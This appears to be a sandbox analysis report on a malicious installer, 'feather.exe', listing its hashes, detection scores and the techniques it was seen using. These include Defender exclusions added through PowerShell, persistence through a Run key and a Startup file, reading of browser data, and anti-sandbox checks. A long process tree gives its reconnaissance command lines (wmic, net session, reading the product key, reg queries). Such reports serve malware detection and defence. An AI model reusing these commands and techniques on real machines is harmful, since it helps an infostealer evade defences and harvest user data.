Overview

Overall score: 8

Task scores (score shown at the end of each task row on the original page)

Score  Sample                 Platform
3      Static                 -
7      feather.exe            windows7-x64
7      feather.exe            windows10-2004-x64
3      $PLUGINSDI...ls.dll    windows7-x64
3      $PLUGINSDI...ls.dll    windows10-2004-x64
3      $PLUGINSDI...em.dll    windows7-x64
3      $PLUGINSDI...em.dll    windows10-2004-x64
1      LICENSES.c...m.html    windows7-x64
1      LICENSES.c...m.html    windows10-2004-x64
1      d3dcompiler_47.dll     windows10-2004-x64
1      feather.exe            windows7-x64
8      feather.exe            windows10-2004-x64
1      ffmpeg.dll             windows7-x64
1      ffmpeg.dll             windows10-2004-x64
1      libEGL.dll             windows7-x64
1      libEGL.dll             windows10-2004-x64
1      libGLESv2.dll          windows7-x64
1      libGLESv2.dll          windows10-2004-x64
1      resources/elevate.exe  windows7-x64
1      resources/elevate.exe  windows10-2004-x64
1      vk_swiftshader.dll     windows7-x64
1      vk_swiftshader.dll     windows10-2004-x64
1      vulkan-1.dll           windows7-x64
1      vulkan-1.dll           windows10-2004-x64
3      $PLUGINSDI...7z.dll    windows7-x64
3      $PLUGINSDI...7z.dll    windows10-2004-x64
Analysis

max time kernel: 843s
max time network: 454s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/06/2024, 17:49
Tasks

Task          Sample                    Resource
static1       Static task               -
behavioral1   feather.exe               win7-20240508-en
behavioral2   feather.exe               win10v2004-20240508-en
behavioral3   $PLUGINSDIR/StdUtils.dll  win7-20240508-en
behavioral4   $PLUGINSDIR/StdUtils.dll  win10v2004-20240508-en
behavioral5   $PLUGINSDIR/System.dll    win7-20240221-en
behavioral6   $PLUGINSDIR/System.dll    win10v2004-20240426-en
behavioral7   LICENSES.chromium.html    win7-20240221-en
behavioral8   LICENSES.chromium.html    win10v2004-20240508-en
behavioral9   d3dcompiler_47.dll        win10v2004-20240426-en
behavioral10  feather.exe               win7-20240508-en
behavioral11  feather.exe               win10v2004-20240426-en
behavioral12  ffmpeg.dll                win7-20240508-en
behavioral13  ffmpeg.dll                win10v2004-20240508-en
behavioral14  libEGL.dll                win7-20240220-en
behavioral15  libEGL.dll                win10v2004-20240508-en
behavioral16  libGLESv2.dll             win7-20240221-en
behavioral17  libGLESv2.dll             win10v2004-20240508-en
behavioral18  resources/elevate.exe     win7-20240221-en
behavioral19  resources/elevate.exe     win10v2004-20240226-en
behavioral20  vk_swiftshader.dll        win7-20240221-en
behavioral21  vk_swiftshader.dll        win10v2004-20240426-en
behavioral22  vulkan-1.dll              win7-20240221-en
behavioral23  vulkan-1.dll              win10v2004-20240508-en
behavioral24  $PLUGINSDIR/nsis7z.dll    win7-20240508-en
behavioral25  $PLUGINSDIR/nsis7z.dll    win10v2004-20240426-en
General

Target: feather.exe
Size: 164.7MB
MD5: a3397ce6bac790f14ca2aea580b93b0a
SHA1: cd632ac684d5fc87009c261313015ba31a5a7f16
SHA256: eee88f50670a3491925a51e8f8765edc339ec025488a083245759d0181969c7c
SHA512: ea74218fd6fa5c832cbeb1e99e562996f16e11f3b8b1adbb7714a21988312a26d3c02d581375bc904f7d808decc9413c48ceba156e3b51817aad67c2e83e6995
SSDEEP: 1572864:a3lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:vPvt1x2z5m1ij
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 8 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid   Process
  2552  powershell.exe
  2296  powershell.exe
  3312  powershell.exe
  4828  powershell.exe
  1284  powershell.exe
  496   powershell.exe
  4704  powershell.exe
  4644  powershell.exe

Disables Task Manager via registry modification

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                  Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation  feather.exe

Drops startup file (1 IoCs)
  description   ioc                                                                                       Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\feather.exe  feather.exe

Executes dropped EXE (2 IoCs)
  pid   Process
  4876  GooseDesktop.exe
  3792  GooseDesktop.exe

Loads dropped DLL (7 IoCs)
  pid   Process
  1804  feather.exe
  1804  feather.exe
  1804  feather.exe
  4876  GooseDesktop.exe
  4876  GooseDesktop.exe
  3792  GooseDesktop.exe
  3792  GooseDesktop.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                                                                                                                             Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupqfB3Eu = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\feather.exe"  reg.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 15 IoCs)
  flow  ioc
  28    raw.githubusercontent.com
  35    raw.githubusercontent.com
  60    raw.githubusercontent.com
  75    raw.githubusercontent.com
  26    raw.githubusercontent.com
  62    raw.githubusercontent.com
  31    raw.githubusercontent.com
  74    raw.githubusercontent.com
  30    raw.githubusercontent.com
  29    raw.githubusercontent.com
  32    raw.githubusercontent.com
  63    raw.githubusercontent.com
  67    raw.githubusercontent.com
  76    raw.githubusercontent.com
  27    raw.githubusercontent.com

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  23    ipinfo.io
  24    ipinfo.io

Drops file in System32 directory (11 IoCs)
  description                   ioc                                                                                         Process
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm    svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat    svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp           svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx           svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log        svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs   svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk           svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat    svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk           svchost.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log           svchost.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs   svchost.exe

Checks processor information in registry (2 TTPs, 7 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                                  Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                feather.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  feather.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2                     feather.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                     feather.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                feather.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  feather.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                     feather.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  2232  schtasks.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
  pid   Process
  3324  WMIC.exe

Kills process with taskkill (2 IoCs)
  pid   Process
  1344  taskkill.exe
  4332  taskkill.exe

Modifies registry class (2 IoCs)
  description  ioc                                                                                   Process
  Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings  mspaint.exe
  Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings  mspaint.exe

Opens file in notepad (likely ransom note) (1 IoCs)
  pid   Process
  4968  notepad.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   Process         Entries (in the order listed)
  1804  feather.exe     10
  3232  powershell.exe  2
  3736  powershell.exe  2
  1804  feather.exe     50

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid   Process
  4876  GooseDesktop.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid   Process      Tokens
  1804  feather.exe  SeShutdownPrivilege, SeCreatePagefilePrivilege
  3660  WMIC.exe     SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this sequence is listed twice)
  2232  WMIC.exe     SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35

Suspicious use of FindShellTrayWindow (3 IoCs)
  pid   Process
  1804  feather.exe
  4876  GooseDesktop.exe
  4876  GooseDesktop.exe

Suspicious use of SetWindowsHookEx (4 IoCs)
  pid   Process
  2560  mspaint.exe
  1292  OpenWith.exe
  3760  mspaint.exe
  1344  OpenWith.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Each row is "source PID wrote to memory of target PID"; every row appears twice in the report unless a different count is given.
  source pid  target pid  source Process  procid_target  entries
  1804        4784        feather.exe     84             2
  1804        1632        feather.exe     86             30
  1804        1316        feather.exe     87             2
  4784        3660        cmd.exe         88             2
  1804        1676        feather.exe     89             2
  1804        4340        feather.exe     91             2
  1804        5084        feather.exe     92             2
  1676        1608        cmd.exe         95             2
  5084        2232        cmd.exe         96             2
  5084        2352        cmd.exe         97             2
  4340        4372        cmd.exe         99             2
  1608        2148        net.exe         98             2
  1804        4336        feather.exe     100            2
  4336        3352        cmd.exe         102            2
  4336        1624        cmd.exe         103            2
  1804        4200        feather.exe     104            2
  4200        3324        cmd.exe         106            2
  4200        2556        cmd.exe         107            2

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid   Process
  2964  attrib.exe
Processes
Process tree (indentation shows parent/child depth; the original page numbers the levels 1 to 4)

PID 1804  C:\Users\Admin\AppData\Local\Temp\feather.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\feather.exe"
  - Checks computer location settings
  - Drops startup file
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory

  PID 4784  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"
    - Suspicious use of WriteProcessMemory

    PID 3660  C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic process where processid=1804 get ExecutablePath
      - Suspicious use of AdjustPrivilegeToken

  PID 1632  C:\Users\Admin\AppData\Local\Temp\feather.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1968 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

  PID 1316  C:\Users\Admin\AppData\Local\Temp\feather.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2044 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

  PID 1676  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "net session"
    - Suspicious use of WriteProcessMemory

    PID 1608  C:\Windows\system32\net.exe
      cmdline: net session
      - Suspicious use of WriteProcessMemory

      PID 2148  C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 session

  PID 4340  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    - Suspicious use of WriteProcessMemory

    PID 4372  C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid

  PID 5084  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    - Suspicious use of WriteProcessMemory

    PID 2232  C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic OS get caption, osarchitecture
      - Suspicious use of AdjustPrivilegeToken

    PID 2352  C:\Windows\system32\more.com
      cmdline: more +1

  PID 4336  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    - Suspicious use of WriteProcessMemory

    PID 3352  C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic cpu get name

    PID 1624  C:\Windows\system32\more.com
      cmdline: more +1

  PID 4200  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    - Suspicious use of WriteProcessMemory

    PID 3324  C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic PATH Win32_VideoController get name
      - Detects videocard installed

    PID 2556  C:\Windows\system32\more.com
      cmdline: more +1

  PID 2924  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

    PID 3232  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      - Suspicious behavior: EnumeratesProcesses

  PID 2484  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"

    PID 3736  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
      - Suspicious behavior: EnumeratesProcesses

  PID 1952  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"

    PID 4472  C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic process where processid=1804 get ExecutablePath

  PID 3988  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

    PID 2660  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

  PID 2052  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

    PID 2544  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

  PID 3436  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

    PID 1484  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

  PID 2216  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

    PID 4424  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

  PID 864  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

    PID 4872  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

  PID 4876  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

    PID 4912  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

  PID 4904  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

    PID 1608  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

  PID 4920  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

    PID 3856  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

  PID 4176  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

    PID 4360  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

  PID 5012  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

    PID 4344  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

  PID 2700  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

    PID 496  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

  PID 3752  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

    PID 4760  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

  PID 3476  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

    PID 4880  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

  PID 2524  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""

    PID 3048  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"

  PID 3432  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

    PID 4116  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

  PID 744  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

    PID 1988  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

  PID 4988  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

    PID 1956  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

  PID 2304  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

    PID 3736  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

  PID 4864  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

    PID 3712  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

  PID 4924  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

    PID 3792  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

  PID 2980  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""

    PID 4204  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"

  PID 2472  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""

    PID 4824  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"

  PID 920  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

    PID 4736  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

  PID 1288  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""

    PID 4076  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"

  PID 4544  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

    PID 1360  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

  PID 848  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""

    PID 2920  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"

  PID 1608  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

    PID 2208  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

  PID 4452  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

    PID 432  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

  PID 3284  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

    PID 4444  C:\Windows\system32\reg.exe
